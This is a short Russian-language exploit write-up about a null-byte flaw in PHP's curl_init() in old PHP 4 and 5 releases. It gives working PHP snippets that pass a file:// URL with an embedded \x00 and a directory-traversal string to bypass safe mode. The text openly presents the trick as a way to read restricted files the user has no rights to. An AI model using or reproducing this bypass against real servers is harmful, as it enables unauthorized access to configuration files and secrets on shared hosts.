Особенности curl_init()
Работает в:
PHP 4.4.2 и более ранние версии.
PHP 5.0.5 и более ранние версии.
PHP 5.1.4 и более ранние версии.


Эта функция позволяет работать с cURL, библиотекой позволяющей получать доступ к файлам через разные 
протоколы, такие как http,ftp,https и т.д. Полезная 
вещь, однако нас она интересует по совсем другим 
причинам, дело в том, что в данной функции 
некорректно обрабатывается нулевой байт, что позволяет обойти safe mode и открывать файлы, которые нам читать запрещено.
Суть баги:
$fd=curl_init("file://restrictedfile.conf\x00"."permittedfile");
$result=curl_exec($fd); 
curl_close($fd);
var_dump($result);
Проверяет всё после нулевого байта, тогда как curl читает файл до нулевого байта. Единственное - файлы можно читать только из директории скрипта, мы не можем использовать "/". Так же можно читать файлы на которые у вас нет прав из другой директории на которую у вас есть права:
curl_init("file:///home/dir/dir/permitteddir/restrictedfile.conf\x00
/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
Собственно таким нехитрым способом можно почитать файлы, прав на которые у нас нет.